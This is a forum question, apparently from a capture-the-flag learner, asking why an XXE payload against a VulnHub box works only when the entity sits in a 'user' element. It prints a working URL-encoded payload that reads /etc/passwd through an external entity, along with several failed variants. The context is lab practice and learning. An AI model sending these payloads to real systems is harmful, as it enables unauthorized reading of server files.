какие теги используются, чтобы избежать использования фильтров в xxe,xml-инъекциях

я делал этот захват флага:https://blog.mzfr.me/vulnhub-writeups/2019-08-24-scare

Я тестировал полезные нагрузки для xxe, но ни один из них не работал, даже после кодирования URL-адресов определенных символов

в пошаговом руководстве, которое я разместил здесь, я увидел, что его полезная нагрузка была слишком похожа на те, которые я использовал

что я обнаружил, так это то, что он пометил запрос, и второй тег должен был быть "пользователем", если нет, это не сработает

вот PayloAD, который работает <%3fxml+version%3d"1.0"%3f><!DOCTYPE+root+[<!ENTITY+test+SYSTEM+'file%3a///etc/passwd'>]><root><user>%26test%3b</user></root>

и вот некоторые полезные данные, которые я использовал и не работал

      %3fxml+version%3d"1.0"%3f><!DOCTYPE+foo+[<!ENTITY+xmli+SYSTEM+"file%3a///etc/passwd">]><xxe>%26xmli%3b</xxe>

<%3fxml+version%3d"1.0"%3f><!DOCTYPE+foo+[<!ENTITY+xmli+SYSTEM+"file%3a///etc/passwd">]><xxe><e>%26xmli%3b</e></xxe>



<%3fxml+version%3d"1.0"%3f><!DOCTYPE+foo+[<!ENTITY+xmli+SYSTEM+'file%3a///etc/passwd'>]><xxe><e>%26xmli%3b</e></xxe>

мои вопросы: почему это должен быть тег «пользователь» и как я могу узнать, что мне нужно его использовать? почему dobble tag?

заранее спасибо и извините за мой английский